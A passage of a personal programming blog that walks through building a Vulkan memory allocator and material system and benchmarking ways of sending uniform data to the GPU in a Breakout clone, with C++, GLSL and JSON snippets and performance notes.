    bool found = findFreeChunkForAllocation(location, memoryType, requestedAllocSize, needsOwnPage);
    //...
}

The after either finding or creating a memory block to use, the allocation function marks that DeviceMemoryBlock as reserved:

pool.blocks[location.blockIdx].pageReserved = needsOwnPage;

Finally, the free function had to be modified to mark any DeviceMemoryBlock that it’s freeing memory from as not reserved:

void free(Allocation& allocation)
{
    //rest of code omitted for brevity
    MemoryPool& pool = state.memPools[allocation.type];
    pool.blocks[allocation.id].pageReserved = false;
    //...
}

With all that in place, I ran the MaterialDemo again, and at long last, got the thing to run with no errors, and only 4 allocations, which means I’m calling work on this done for now.

Wrap Up

I’m really glad that I decided to dig into this rather than just grab GPUOpen’s allocator. I learned a ton about Vulkan memory that I’m quite positive I never would have learned otherwise. As mentioned many times, all the code for this is available on github

As per usual, I’m sure I’m doing a hundred different dumb things in this article, and I’d love you to send me a message on Twitter, or @Khalladay on Mastodon if you spot on of them (or want to say hi).

Tune in next time when I try to finally add instances to the material system!

Lessons Learned While Building a Vulkan Material System

2017-11-27T00:00:00+00:00

One of the things I’m noticing about learning Vulkan, is that there isn’t a lot of material out there to bridge the gap between being a complete beginner, and being able to build your own real applications.

I didn’t realize how big this gap was was until I decided to start my next Vulkan project by building a material system. It was supposed to just be the first step in something bigger, but I realized pretty quickly that I didn’t know nearly enough to even get this small piece done. So I scrapped my loftier plans, and decided to split building the material system up into two parts. The first phase (which is the part I have done) was to simply load materials from a file which specified which shaders to use, and which default values to use for their inputs. To keep things simple, I’ve so far always been loading the material onto a full screen quad.

The second phase will be to extend the system to handle material instances, and thousands of objects, but before I dive into that, it felt like a good time to take a step back and write down some of the things I’ve had to figure out to get this far, in case someone else gets stuck in the same places.

One of my tests was Inigo Quilez's raymarching primitives shader

This post is going to jump around a little bit, as you’ll notice by the headings. Some things I want to share are just things I didn’t realize about how to use the Vulkan API, some are “good ideas” that are working out for me so far, and finally I want to write a bit about the high level structure of how my material system works.

All the code for everything is on github, and I’ve tried to add helpful comments to material_creation.cpp, which contains most of the stuff I’m talking about here. Standard caveats to everything: I barely know what I’m doing, there’s probably better ways to do this, I’m not a lawyer, yadda yadda yadda.

How Descriptor Sets (and Bindings!) Work

The first thing that I really needed to get a handle on was how descriptor sets work in Vulkan GLSL. It’s easy enough to look at the syntax and realize that they’re a method for grouping shader inputs and move on, but there’s a bit more to them than that.

For one, Vulkan shaders aren’t namespaced, so Descriptor Set 0 in your vertex shader, is Descriptor Set 0 in your fragment shader (or any other stage you’re using in your material). This also means that a single descriptor set can have bindings that exist in different shader stages, but still all belong to the same set. Even more fun, since the SPIR-V compiler will (likely) remove any variables not in use by your shader, your shader stages may all have the same Descriptor Set Binding in them, and see different versions of that binding.

Let me show you what I mean. If you have a vertex shader that uses descriptor set 0, binding 0, to hold some global information:

layout(binding = 0, set = 0)uniform GLOBAL_DATA
{
    float time;
    vec2 mouse;
}global;

But your actual shader code only ever uses the time member of the GLOBAL_DATA uniform, the compiler will optimize away the mouse member var entirely. However, your fragment shader might also need access to global data, and if it uses the mouse data, and not the time data, it won’t even know that set 0, binding 0 has the time member in it.

To keep everyone on same page despite this, data about the size of the overall uniform is still there (that is, the size of the struct with ALL members, including compiled out ones, present), along with information about the offset into the struct that a member sits at. So your fragment shader, which only knows about mouse data, will still know that the GLOBAL_DATA uniform is 32 bytes large, and the mouse data is offset 16 bytes from the start of the uniform buffer. With this information, it doesn’t matter which member vars each stage sees.

Note that uniform members are 16 byte aligned in Vulkan, more on that later.

Use Descriptor Sets To Group Inputs By Update Frequency

You can’t bind an individual set binding in a command buffer, you have to bind an entire descriptor set at once, and binding a descriptor set is a performance heavy operation. What you should do (at least according to NVidia’s Article), is use your descriptor sets to group shader inputs by how frequently they need to be swapped out. Once a descriptor set is bound, it stays bound for the duration of that command buffer, until something else gets bound to that set index. So if everything uses the same set 0, you can bind it once and never pay the cost to bind that again (until next frame).

In my project, I chose set 0 to store Global data which all shaders can access, which will get bound at the beginning of a frame and stay bound while rendering everything, left set 1 alone for a future experiment, and used sets 2 and 3 for data which can change on a per material / per material instance basis. Set 2 is for data which will get set when a material or instance is first loaded and then never changed (like the albedo texture of a character), while set 3 is for shader inputs that can be manipulated at runtime.

An example of how this might play out:

for each view {
  bind global resourcees          // set 0

  for each shader {
    bind shader pipeline  
    for each material {
      bind material resources  // sets 2,3
    }
  }
}

Obviously this is a pretty simple rendering model, but it’s good enough for this stage of my material system’s life.

Technically speaking, sets 2 and 3 could be one set, but having a separation between static and dynamic data made sense to me, since I have to keep around a lot more information about the dynamic data to facilitate updating it later, but time will tell if this is a good idea or not. I think it largely depends on if theres a higher cost associated with binding multiple descriptor sets in one call to vkCmdBindDescriptorSets.

VkDescriptorPools Can Store Descriptors of Different Types

This is pretty obvious if you’re reading the actual API docs, but when I started this, most of my information was coming from tutorials like vulkan-tutorial.com, which never explicitly points out that your descriptor pools don’t have to be segregated by descriptor type. You can store uniform buffers, combined image samplers, dynamic buffers, the whole shebang in the same pool.

Getting Arbitrary Descriptor Set Layouts

The last three points were more about general Vulkan knowledge, but the rest are all about implementation details.

The most obvious problem with building a generic material loading system in Vulkan vs OpenGL is the lack of shader reflection available at runtime. In OpenGL all this functionality was there by default, but in Vulkan we need to use the wonderful SPIR-V Cross library to help us get at this information.

I didn’t want to embed SPIR-V Cross in my runtime application, since it felt like unnecessary bloat, so I wrote a separate application that I called the “ShaderPipeline” (also available on github). This program runs whenever a shader has been edited, and handles compiling GLSL into SPIR-V, and creating json files (.refl files) that store reflection information about these shaders.

One of these .refl files might look like the following:

{
    "descriptor_sets": [
        {
            "set": 0,
            "binding": 0,
            "name": "GLOBAL_DATA",
            "size": 32,
            "type": "UNIFORM",
            "members": [
                {
                    "name": "mouse",
                    "size": 16,
                    "offset": 16
                }
            ]
        }
    ],
    "global_sets": [
        0
    ],
    "static_sets": [],
    "dynamic_sets": [],
    "static_set_size": 0,
    "dynamic_set_size": 0,
    "num_static_uniforms": 0,
    "num_static_textures": 0,
    "num_dynamic_uniforms": 0,
    "num_dynamic_textures": 0
}

You’ll notice that at the end I have some extra data about which descriptor sets are global, dynamic, or static, and how many of each type we have. This information is obviously not technically necessary, but this way I can decide to change which sets belong to which category at the ShaderPipeline level instead of the runtime application, and having the counts available was just handier than counting them later.

Fill Gaps In Your VkDescriptorSetLayout Array With Empty Elements

This one definitely threw me for awhile until I figured out what to do, since it’s not something that I saw in any tutorial or example code before trying this project out.

One of the first things you need to do when you’re creating your material is to make VkDescriptorSetLayouts for each descriptor set in use by the shaders in your material. Eventually, you use this array of DescriptorSetLayouts as part of your VkPipelineLayoutCreateInfo struct. One thing you may have noticed is that a VkDescriptorSetLayout struct doesn’t have any spot for specifying which set that layout is for. This means the api assumes that the array of VkDescriptorSetLayouts that you use is a continuous collection of sets - that is - if your array is 3 elements long, it is for sets 0, 1, and 2.

In practice, you’ll likely have gaps in the sets that your shaders use, especially if you assign each set number a specific use case, like I did above. In this case, you need to make a VkDescriptorSet for each set you aren’t using as well. These “empty” elements will have their binding count set to 0, and their pBindings array set to null, but still need to be in your final array of set layouts, or else nothing is going to work right.

If you’re manually specifying a struct that maps to a set, alignment matters

To keep things simple, I’m keeping my global data as a mapped struct, since I’m assuming (hoping?) that because it’s not a lot of data, and it only gets updated once a frame, there won’t be much of a performance penalty (this is untested right now though, so… ymmv).

When I first set this up, I defined my struct like so:

struct GlobalShaderData
{
    glm::float32 time;
    glm::vec4 mouse;
    glm::vec2 resolution;
    glm::mat4 viewMatrix;
    glm::vec4 worldSpaceCameraPos;
};

and this compiled and ran…sorta. Data was getting sent to the gpu, but the wrong data seemed to be filling the variables in the shader. Turns out, this is because (as mentioned earlier) uniform struct members are 16 byte aligned in Vulkan.

Awkwardly, fixing this problem in MSVC looks like this:

struct GlobalShaderData
{
    __declspec(align(16)) glm::float32 time;
    __declspec(align(16)) glm::vec4 mouse;
    __declspec(align(16)) glm::vec2 resolution;
    __declspec(align(16)) glm::mat4 viewMatrix;
    __declspec(align(16)) glm::vec4 worldSpaceCameraPos;
};

I’m about 110% positive there’s a less awful way of doing this, so please, please let me know what it is on Twitter.

That’s the end of the “potentially helpful to everyone” segment of the post, if you want to know more about the structure of my material systeem so far, read on!

My Ugly Little Material System

To preface: I’m going to include more information than anyone needs, because I wish implementation details about how someone else had approached this problem was readibly available to me before I started on this path.

As I mentioned earlier, my system works in two passes. The first pass, called the “ShaderPipeline”, is an application that gets run whenever a shader is modified. This handles compiling GLSL into SPIR-V, and generates the reflection files I talked about earlier.

Materials are defined in their own json files (I don’t love json, but rapidjson is really easy to use), which specify which shaders to use for each stage, and default values for their inputs. A Simple material might look like this:

{
  "shaders":
  [
    {
      "stage": "vertex",
      "shader": "vertex_uvs",
      "defaults":
      [
        {
          "name":"Instance",
          "members":
          [
            {
              "name": "tint",
              "value": [0.0, 1.0, 1.0, 1.0]
            }
          ]
        }
      ]
    },
    {
      "stage": "fragment",
      "shader": "fragment_passthrough",
      "defaults":
      [
        {
          "name": "texSampler",
          "value":"../data/textures/airplane.png"
        }
      ]
    }
  ]
}

When a material is loaded from a file, this material file is unpacked into a Material::Definition struct, which is formatted to make it easy to access the data we need when creating the vulkan material. Below is what that struct looks like, but if you want to know what the custom types inside it are (like PushConstantBlock), go check out material_creation.h

struct Definition
{
  PushConstantBlock pcBlock;
  std::vector<ShaderStageDefinition> stages;
  std::map<uint32_t, std::vector<DescriptorSetBinding>> descSets;

  std::vector<uint32_t> dynamicSets;
  std::vector<uint32_t> staticSets;
  std::vector<uint32_t> globalSets;

  uint32_t numStaticUniforms;
  uint32_t numStaticTextures;
  uint32_t numDynamicUniforms;
  uint32_t numDynamicTextures;
  uint32_t staticSetsSize;
  uint32_t dynamicSetsSize;
};

The Material::Definition struct is what gets passed to the material creation function. If you really wanted to, you could create a definition at runtime and make new materials on the fly. I’m sure at some point I’ll think of a clever reason to do that.

The advantage of this Material::Definition struct is that it’s trivial to add more information to it. If I wanted my material json files to specify blend mode, ZWrite behaviour, Culling Mode, Polygon Mode, or anything else, I can just add a field to this and grab it out of the json. For now, the creation method just assumes I want an opque, ZWriting, Cull Back, Polygon Filled material, but that will be made configurable pretty much as soon as I want to have a translucent material.

Once loaded, all the data needed to render a material is stored in a MaterialRenderData struct:

struct MaterialRenderData
{
  //general material data
  VkPipeline pipeline;
  VkPipelineLayout pipelineLayout;

  uint32_t layoutCount;
  VkDescriptorSetLayout* descriptorSetLayouts;

  VkDescriptorSet* descSets;
  uint32_t numDescSets;

  UniformBlockDef pushConstantLayout;
  char* pushConstantData;

  //we don't need a layout for static data since it cannot be
  //changed after initialization
  VkBuffer* staticBuffers;
  VkDeviceMemory staticUniformMem;
    uint32_t numStaticBuffers;

  //for now, just add buffers here to modify. when this
  //is modified to support material instances, we'll change it
  //to something more sane.
  MaterialDynamicData dynamic;
};

There are a few things to talk about here. Firstly, I store the data used for a material’s push constants in the RenderData struct, so that if nothing has changed since the last time they were set, we have that data already sorted out. Rather than store each of the push constant members in a map, or other collection, I keep all the data for the entire push constant block in a char* buffer, and then store layout data about that char* in a UniformBlockDef struct, which looks like this:

struct UniformBlockDef
{
  //stride 2 - hashed name / member offset
  uint32_t* layout;
  uint32_t blockSize;
  uint32_t memberCount;
  VkShaderStageFlags visibleStages;
};

As the comment says, instead of storing string names for the member vars, I hash them and store them along with each member’s offset into the buffer.

Setting a push constant value on a material then becomes a simple matter of looping over this layout buffer until you find the member you want, and using the offset data located next to it:

void setPushConstantData(uint32_t matId, const char* var, void* data, uint32_t size)
{
  MaterialRenderData& rData = Material::getRenderData(matId);

  uint32_t varHash = hash(var);

  for (uint32_t i = 0; i < rData.pushConstantLayout.memberCount * 2; i += 2)
  {
    if (rData.pushConstantLayout.layout[i] == varHash)
    {
      uint32_t offset = rData.pushConstantLayout.layout[i + 1];
      memcpy(rData.pushConstantData + rData.pushConstantLayout.layout[i + 1], data, size);
      break;
    }
  }
}

Then when it’s time for that material to be rendered, I can just grab the entire buffer of push constant data and send it on its way.

I like this approach to the problem because it makes Push Constant members (and other dynamic data, which uses a smiliar paradigm) “fire and forget” data, that is, nothing blows up if I try to set a push constant var on a material that doesn’t have that member, the function just doesn’t find the member in the layout buffer and does nothing. It ends up working very much like the functions for setting shader inputs on Unity’s Material class.

I use this same paradigm to handle setting dynamic uniform data, although in that case I have to call vkCmdUpdateBuffer instead of just memcpying, since I have to update device local memory. This could probably be sped up by collecting all the updates for a frame and then doing the vulkan update once, but I’ll worry about that in phase 2. Dynamic uniforms also need a bit more information stored about them, so I have a separate struct, called MaterialDynamicData to store that:

struct MaterialDynamicData
{
  uint32_t numInputs;

  // stride: 4 - hashed name / buffer index / member size / member offset
  // for images- hasehd name / textureViewPtr index / desc set write idx / padding
  uint32_t* layout;
  VkBuffer* buffers;
  VkDeviceMemory uniformMem;

  VkWriteDescriptorSet* descriptorSetWrites;
};

The big difference between this and the push constant data is that I’m also keeping the VkWriteDescriptorSet structs around, so that I can change what textures are being used at runtime, and the layout buffer is storing more information per member, but it’s all pretty much working the same way as the push constants.

These MaterialRenderData structs are stored in a map (boo!) that uses uint32_ts as keys. When the renderer wants to get the information about a mesh’s material, it uses the integer material name to get the corresponding struct, and Bob’s your uncle.

Problems and Limitations With My System

Oh boy, there’s a lot of them. Probably the biggest being that none of it has actually survived being used in a real project, but I suppose there’s some more specific things to point out.

Number one is that storing the VkDeviceMemory directly in the material is probably bad, and should likely be replaced by an actual allocator doing actual allocator things.

Secondly, as mentioned before, this doesn’t handle material instances at all yet, so if you want two materials, using the same shaders but a different texture, you need two whole materials to do it. Phase 2 of this project will remedy that, and add some more customization options to the Material::Definition struct.

All my materials are stored in maps, and setting any data on them requires a map lookup to get the MaterialRenderData struct for that material. This results in a LOT of unnecessary map lookups. Looking up materials by id is going to happen an awful lot, and I’m not thrilled about using a map at all (but it was easy!). Instead, this should probably do something like store materials in an array, use the integer id to store an index into the array and some additional data to handle when an array slot gets re-used (like Bitsquid does with their ECS)

It also should probably support hot reloading of shaders to make editing easier, maybe I should add a phase 3?

Regardless, hopefully this article was helpful to someone! If you want to say hi / want to point out something dumb I’m doing. give me a shout on Twitter, or @Khalladay on Mastodon.

Improving Vulkan Breakout

2017-08-30T00:00:00+00:00

There are lots of reasons why I love the internet, but one of the big ones is that it gives me a way to learn from folks that I would never get to interact with in real life.

Two weeks ago I posted about Comparing Uniform Data Transfer Methods In Vulkan, and immediately got a bunch of great suggestions from Twitter (thanks @SaschaWillems2!), and from reddit on how I could improve things. There was enough there that I thought it warranted revisiting my Breakout clone to test out some new ideas.

Me irl

The main pieces of feedback were:

vkCmdWriteTimestamp could be used to get more fine grained timing data
I really didn’t need to be using _aligned_malloc with my dynamic uniform buffer approach
It might be faster to use device-local memory
With the approaches that don’t use push-constants, it might be faster to re-use command buffers instead of creating them every frame

It all sounded like great advice to me, so I decided to try out each point listed above, to see if the conclusions drawn in the first post are still valid.

Starting from the top:

Use vkCmdWriteTimestamp

I loved this bit of feedback, because it gave me another tool to use to do performance testing! Especially because before hearing about this bit of the api, I had no idea how to profile the performance of a specific chunk of a command buffer.

vkCmdWriteTimestamp writes it’s timing data into a VkQuery object. VkQuery objects are stored in a VkQueryPool. So the first step to getting timing data from vulkan is to create one of those:

VkQueryPoolCreateInfo createInfo = {};
createInfo.sType = VK_STRUCTURE_TYPE_QUERY_POOL_CREATE_INFO;
createInfo.pNext = nullptr;
createInfo.queryType = VK_QUERY_TYPE_TIMESTAMP;
createInfo.queryCount = 2;

VkResult res = vkCreateQueryPool(device, &createInfo, nullptr, &queryPool);
assert(res == VK_SUCCESS);

Since I only want to time the part of the rendering pipeline that changes between each uniform data implementation, I only need to allocate 2 queries - one to store the timestamp immediately before the block I’m timing executes, and one to store the timestamp after it’s done.

With that done, all that’s left is to add the appropriate calls to the draw function:

//abbreviated code

vkBeginCommandBuffer(commandBuffer, &beginInfo);
vkCmdResetQueryPool(commandBuffer, queryPool, 0, 2);

//more set up code... (omitted for brevity)

//the block we want to time starts here
vkCmdWriteTimestamp(commandBuffer, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, queryPool, 0);

for (int i = 0; i < PRIM_COUNT; ++i)
{
    //per primitive logic that we want to time
}
vkCmdWriteTimestamp(commandBuffer, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, queryPool, 1);

As you may have noticed, vkCmdWriteTimestamp takes a pipeline stage as one of it’s arguments. This was unintuitive for me, but here’s what the docs say about it:

“vkCmdWriteTimestamp latches the value of the timer when all previous commands have completed executing as far as the specified pipeline stage, and writes the timestamp value to memory. When the timestamp value is written, the availability status of the query is set to available.”

What it seems like this means (correct me if I’m wrong, internet), is that if you pass VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to this function, you get the timestamp of when all the commands submitted to the command buffer BEFORE you call vkCmdWriteTimestamp have completed executing, whereas if you pass, for instance VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, you’d get the timestamp of when the commands before the timestamp call started execution.

Assuming that’s the case, then in order to measure just the execution of our loop in the above example, both calls to vkCmdWriteTimestamp need to be passed the VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to get just the timing info for the code between the two calls.

If you recall, the frame time of each approach was measured last week as the following:

I re-ran this test, but this time used vkCmdWriteTimestamp to measure just the time it takes to add the primitives to the command queue and set up their uniform data:

This data is likely of questionable usefulness because of how light the entire application is on the GPU, but it’s interesting nonetheless. It suggests that the push constant and single buffer approaches are equal in how fast they are to execute on the GPU. This might mean that the frametime difference between them was mostly due to the added time it took to memcpy data into the buffers for the single buffer approaches.

The multi-buffer approaches are slower than the others in this measure as well, which makes sense given that even when submitting to the command buffer, the multi-buffer branches have to change which buffers are bound all the time. However, because of how simple our frame is, all the approaches are almost exactly as fast. If the above timing code is accurate, it means that all the larger differences we’re seeing in the frametime of the application are due to the cost of memory mapping, and memcpying our uniform data around.

Don’t Use _aligned_malloc

The next piece of feedback came from reddit user rhynodegreat, and it is directly related to the cost of memory mapping we just talked about. It was pointed out that since I was using memcpy to transfer data to a mapped buffer pointer, I didn’t need to be using _aligned_malloc for the original allocation. I admit this was a bit of cargo culting on my end. I originally figured out how to use dynamic uniform buffers from some example code I found online, and didn’t question the use of _aligned_malloc, since I had never used it before.

Luckily, removing it from my code was as simple as replacing any calls to it with a simple malloc call.

uniformData = (PrimitiveUniformObject*)_aligned_malloc(bufferSize, dynamicAlignment);

becomes

uniformData = (PrimitiveUniformObject*)malloc(bufferSize);

Everything still works with the above changes, but I was curious as to whether it had any performance implications, so I compared the DynamicUniformBuffer approach from earlier with the same approach using a regular malloc. I was going to show this in another graph, but I found no real performance difference between them, so it feels like (at least for this use case), whether to use _aligned_malloc or just malloc is a matter of preference / code portability.

How i felt when I saw a graph with all the bars the same height

However, while testing this, I realized that (for the Single Buffer Approach), I could reduce the need for this allocation at all with a very small amount of effort. If I could get the mapped pointer to the buffer before I pass this data to the draw function, I could save myself a lot of effort. So I rearranged things a bit to try that out:

//abbreviated code
uniformData = (PrimitiveUniformObject*)malloc(bufferSize);

int idx = 0;
char* uniformChar = (char*)uniformData;

for (const auto& prim : primitives)
{
    PrimitiveUniformObject puo;
    puo.model = VIEW_PROJECTION * (glm::translate(prim.pos) * glm::scale(prim.scale));
    puo.color = prim.col;

    memcpy(&uniformChar[idx * dynamicAlignment], &puo, sizeof(PrimitiveUniformObject));
    idx++;
}

Renderer::draw(uniformData, /* other args */);

Becomes:

//abbreviated code

int idx = 0;

char* uniformChar = Renderer::mapBufferPtr();

for (const auto& prim : primitives)
{
    PrimitiveUniformObject puo;
    puo.model = VIEW_PROJECTION * (glm::translate(prim.pos) * glm::scale(prim.scale));
    puo.color = prim.col;

    memcpy(&uniformChar[idx * dynamicAlignment], &puo, sizeof(PrimitiveUniformObject));
    idx++;
}

Renderer::unmapBufferPtr();

Renderer::draw( /* other args */);

The unmapBufferPtr() call can simply be omitted in order to keep things mapped all the time.

I decided to compare the performance of the Single-Buffer approaches with these changes vs the timing data that I presented last time, and it appears that the above changes yield a modest speed up for all approaches except using push-constants, since they didn’t need the _aligned_alloc call in the first place.

Assuming my methodology for these tests is correct (this is outlined at the end of the post), the data points to at least a small performance improvement from removing that unnecessary memcpy, and cleaner code, since it avoids an unnecessary allocation, and copy.

Use Device-Local Memory

I liked this piece of feedback because it forced me to actually validate an assumption I made in the previous post: that data which gets 100% updated every frame likely doesn’t benefit from being device local. So I’m starting with that as my hypothesis.

For the most part, changing things to use device local memory was surprisingly easy. All it took was changing what buffer was getting mapped when I wanted to transfer uniform data, and then adding code to copy that data (now in a staging buffer) to the device local memory that the shaders ended up using. Given that the nuts and bolts of using a staging buffer are already excellently presented at vulkan-tutorial.com, I’m going to skip talking about that here. You can always check out the repo if you’re curious.

I updated the performance graph from last week with timings using device local memory. I also included timings using vkTimestamps for the draw functions as well (again, only for the loop that created and submitted draw calls, since that’s what changed between different versions).

In 3D to show the really small values too

Turns out my hypothesis was wrong. Spectacularly wrong.

The huuuggeee increase in frametime for the multi-buffer versions took me off guard. It’s so high that I’m wondering if I’m not making another weird mistake in my implementation (please, spot my mistake in the renderer.cpp file), but I suppose it does make some sense, given that we’re asking the gpu to do 5000 copy buffer operations every frame in addition to everything else.

That being said, for the single buffer approach, using device-local memory pushed it’s average time per frame to the same speed as using push-constants, which is interesting, but I’m not sure I expect that to hold up given heavier loads (although I’m not sure which one would win in that case). Sounds like something to test in a later (more complex) project.

For now though, the message from this is test is clear: use device-local memory for data which doesn’t get updated frequently (or at least, which doesn’t require a lot of copy buffer operations per frame).

Last note - the two graphs were generated in different runs of testing, so the numbers don’t 100% add up between the two of them, but they’re close enough for me to feel comfortable drawing early conclusions about how to use Vulkan, so I’m not losing any sleep over it.

Re-use Command Buffers

The last bit of advice that I wanted to look into was that I am wasting time recreating command buffers that are mostly identical every frame. The only time the command buffer actually changes is when a brick gets removed. Since all the tests that I’m running involve a static scene anyway, I’m going to work around that here by just having logic move the hit bricks off-screen, instead of removing them. I definitely couldn’t get away with changes like this on a real project, but it works well enough to get some performance data in this case.

I made a few changes to the project so that the actual draw function doesn’t record any commands, it simply submits the pre-recorded command buffers that are generated at the beginning of the project. Unsurprisingly, this is pretty good for performance:

You can't reuse a command buffer with push constants (as far as I know)

From the graph, you can see how much this improves the performance of basically everything. In fact, compared to everything else that I tried, reusing command buffers was by far the single most impactful thing for the performance of the program. It literally made almost everything (except mapping a per object buffer every frame) faster than the push-constant approach, which so far has been the most performant way to do things in every test. I assume that even a less aggressive buffer re-use strategy would pay dividends in a more complex project, and I’m certainly going to be structuring future projects to take advantage of this as much as possible.

I also decided to test to see how these improvements fared when using device-local memory:

Maybe anticlimactically (since this is my last graph), for the single buffer approaches this did basically nothing. For the multi-buffer approaches, the overhead of doing a vkCmdCopyBuffer for each object every frame still hit performance so hard that reusing the command buffers really didn’t matter. The lesson to gain from all this: pay attention to how often you update a chunk of data before deciding to make it device-local, since that could be doing more harm than good.

I would have taken vulkan timestamp measurements of all of this, but I realized after taking data down the first time that I had changed the first timestamp call to VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT to test something out earlier and had forgotten to change it back, making any timestamp data I got here completely useless for comparing against previous data, and I’m sick to death of this Breakout clone, so I decided to just press on and omit those measurements.

Conclusion

That’s all for today! When I started making my little Breakout clone, I had no idea that it was going to turn out to be so informative! That being said, I need to move on now. There were some bits of advice that I got that I really liked, that I didn’t end up trying out here simply to save my sanity. This code was never written to be anything other than throwaway code, and it’s time to throw it all out and start fresh. Who knows, maybe my next foray into vulkan will even have textures!

If you spot any errors (there’s likely a ton) in the above code, or just want to say hi, I’m always around on Twitter!. I’ve learned more from people pointing out my mistakes in the past week than I did actually building this thing from scratch, so keep the feedback coming!

Appendix: Testing Methodology
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:

When testing, the time step of the game logic was set to 0 (rather than deltaTime), so that any variations in frame rate from things like removing bricks, or handling game restart logic were eliminated. Then, the game was run for 20k frames, reporting the average frametime after every 5k frames. This gave me 4 average frame time numbers. I discarded the highest and lowest of these numbers, and then averaged the two remaining values to produce an average frametime for the test.

I monitored my CPU and GPU temp with the Cam Web App, and let both of them return to their resting temp between tests (61 and 66 C respectively), and made sure that the same applications (and only those applications) were running alongside the breakout program.

I repeated this test 2 more times, at different times of the day (after using the laptop to do other tasks), which gave me 3 frametime averages (1 per run of the test). I chose the median of the three to present in the graph above.

Unless vkCmdWriteTimestamp data was included in the graph, the calls to vkCmdWriteTimestamp were removed via an ifdef

Finally, all tests were done in Release builds, without a debugger attached or any validation layers turned on, and connected to a wall outlet to prevent any kind of throttling on battery to interfere with anything.

All the source for everything is on github, I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.

Comparing Uniform Data Transfer Methods in Vulkan

2017-08-13T00:00:00+00:00

Lately I’ve been trying to wrap my head around Vulkan. As part of that, I’ve been building a small Breakout clone (github) as a way to see how the pieces of the API fit together in a “real” application.

When I’m starting to learn a new graphics API, the thing that I try to focus on is getting used to all the different ways to send data from the CPU to the GPU. Since my Breakout clone didn’t have textures, or meshes (really) to speak of, that left the per frame uniform data for each object on screen.

The "Playable" version of the Breakout Clone

Looking at a few vulkan examples I could find, and taking a quick glance through the API, I settled on 5 different options for getting my uniform data sent to the card:

Using push-constants
Using 1 VkBuffer and keeping it mapped all the time
Using 1 VkBuffer and mapping/unmapping per frame
Using multiple VkBuffers, and keeping them all mapped
Using multiple VkBuffers, and mapping/unmapping every frame

All the guidelines out there are pretty clear when they say to use push-constants for data that has to change on a per-object basis every frame, but given that push constants have a size limit, it made sense to give each of the above approaches a whirl, since they conceivably all will have their place in a large application.

So, in the interest of whirling, I put a branch in my repo for each, and then tracked the average frame-time of each to see how much faster or slower each approach was.

However, Breakout is really not a good test for a GTX 1060, and with 500 blocks on screen, I was running every test at < 1 ms per frame. The times were so small, that even between runs of the exact same version of the program, the results were too varied to be much use (since even a change in measured time of 1/100th of an ms became significant). To make things a bit easier to work with, I added a mode to the game which rendered 5000 blocks at a time.

which admittedly looked sorta ridiculous

This produced much more stable results (ie/ could be reproduced in multiple runs), which I want to provide here to give context to the rest of this blog post.

The big takeaway here is that mapping memory is a really slow process, so if you need something mapped, keep it that way for as long as you can. This is likely not news to anyone except me, since I’ve been living in mobile engine land for my whole career and really haven’t had to worry about that. Oh, and the guides were right, you should totally use push constants when you can. If you can’t use them, there’s a slight advantage to packing multiple objects worth of data into a single buffer, vs giving every object it’s own.

With that in mind, I want to walk through the implementation details of each approach, because I wish something like that had existed before I started down this rabbit hole. If you were only interested in the performance results, you can stop reading and go about your life :) If you’re scratching your head as to how to do one or more of these things, join me below!

Preliminary info

In order to make much sense of the code I’m going to share, it will be helpful to understand that my code stores uniform data that will be sent to the GPU in a struct called PrimitiveUniformObject, which directly maps to the layout of the uniform data in the shader:

//CPU
struct PrimitiveUniformObject
{
    glm::mat4 model;
    glm::vec4 color;
};

//glsl
layout(set = 0, binding = 0) uniform PER_OBJECT
{
    mat4 mvp;
    vec4 col;
} obj;

Hopefully that makes sense! I’m going to try to keep all the snippets I share abbreviated enough that you otherwise don’t need to care about how I structured things, but I couldn’t get around telling you about this tiny bit.

I’m also going to assume that you’re at least at the level I was when I started this project, that is, you’ve gone through vulkan-tutorial.com, and therefore understand how to allocate a VkBuffer. If you aren’t there yet, click the link to the tutorial and come back in a few hours. Things will make much more sense.

Multiple, Unmapped Buffers

Let’s start by talking about the approaches that felt most intuitive for me right off the bat, giving each drawable entity (which my code calls a Primitive) it’s own VkBuffer to store it’s own uniform data, and a VkDescriptorSet to know about that buffer:

struct PrimitiveInstance
{
    vec3 pos;
    vec3 scale;
    vec4 col;

    VkBuffer uniformBuffer;
    VkDescriptorSet descSet;
    VkDeviceMemory bufferMem;
    int meshID;
};

My project was simple enough (and my gpu forgiving enough) that I could get away with doing a VkDeviceMemory allocation for every primitive. On a larger project you’d have to do something smarter than that.

Since the entirety of the data stored in the VkBuffer is going to get updated every frame, and we’re going to update the data with a single write to the buffer data, I allocated the VkBuffers with host coherent memory, which makes things nice and easy when it’s time to update the data:

//abbreviated code:
PrimitiveUniformObject puo;
puo.model = VIEW_PROJECTION * (glm::translate(pos) * glm::scale(scale));
puo.color = col;

void* udata = nullptr;
vkMapMemory(device, bufferMem, 0, sizeof(PrimitiveUniformObject), 0, &udata);
memcpy(udata, &puo, sizeof(PrimitiveUniformObject));
vkUnmapMemory(device, bufferMem);

Since we’ve already taken a look at the performance graph, we know that mapping/unmapping the buffer for each Primitive, every frame, is a performance killer. We can work around that with the next approach and get much better results.

Multiple, Always Mapped Buffers

To make the multiple buffer approach faster, all we need to do is to add one more variable to the PrimitiveInstance struct:

struct PrimitiveInstance
{
    vec3 pos;
    vec3 scale;
    vec4 col;

    VkBuffer uniformBuffer;
    VkDescriptorSet descSet;
    void* mapped;
    int meshID;
};

In this approach, when a primitive was created, the data for their buffer was immediately mapped, and the address stored in the mapped pointer above. Note that the PrimitiveInstance struct doesn’t contain a PrimitiveUniformObject, those get created per frame by combining the easier to work with variables we have here.

//abbreviated code:
PrimitiveUniformObject puo;
puo.model = VIEW_PROJECTION * (glm::translate(pos) * glm::scale(scale));
puo.color = col;
memcpy(mapped, &puo, sizeof(PrimitiveUniformObject));

Then, all that’s needed is to submit each object’s descriptorSet to the rendering function, and pass the right one to vkCmdBindDescriptorSets at the right time. As you saw in the graph earlier, this approach was the slowest of the three approaches that didn’t involve mapping/unmapping data every frame.

